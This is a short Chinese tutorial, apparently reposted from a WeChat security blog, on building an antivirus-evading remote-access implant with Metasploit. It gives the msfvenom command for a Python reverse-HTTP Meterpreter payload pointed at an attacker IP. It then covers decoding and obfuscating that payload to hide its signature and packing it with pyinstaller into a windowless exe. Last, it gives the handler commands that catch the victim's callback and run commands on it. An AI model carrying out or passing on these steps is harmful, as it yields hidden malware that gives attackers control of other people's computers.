1
Part.1
首先
我们打开终端输入此项命令生成python文件用来上线MSF
msfvenom -p python/meterpreter_reverse_http LHOST=<IP> LPORT=<port> - f raw -o msf.py然后我们打开py文件后可以看到py代码
现在就可以复制里面的base64代码进行解密
这样我们就拿到了里面的python代码内容
然后我们就可以对python代码进行修改,加密,混淆等操作,来隐藏自己的特征
这个呢就是我修改过后的⼀个python代码
然后呢我们就可以把代码打包为可执行文件尝试免杀效果了
pyinstaller -F -w msf.py上面的pyinstaller是python打包的⼀个⼯具用来把python文件打包为exe的工具
-F参数就是生成单个可执行文件
-w参数就是不让其显示DOS窗又
然后就可以看到以下的信息
我们现在进入dist文件夹下找到msf.exe文件
2
Part.2
这就是我们的成品了哦
现在我们打开msf来连接
msfconsole紧接着依次输入下面命令
use exploit/multi/handlerset payload python/meterpreter_reverse_httpset lhost <IP>set lport <PORT>run
此时目标机器运行我们的exe就会上线
此时我们执行⼀些命令
THE
END
思路就分享到这里,大家也加油哈!
文章来源: http://mp.weixin.qq.com/s?__biz=MzkzOTE5MTQ5Ng==&mid=2247484466&idx=2&sn=8c892fcb3a8521644fd2d45a54d2e77f&chksm=c2f5f995f5827083dca6f2563c99b2febe1b2002e8990a55a50533d26b1b85938b378227e852#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh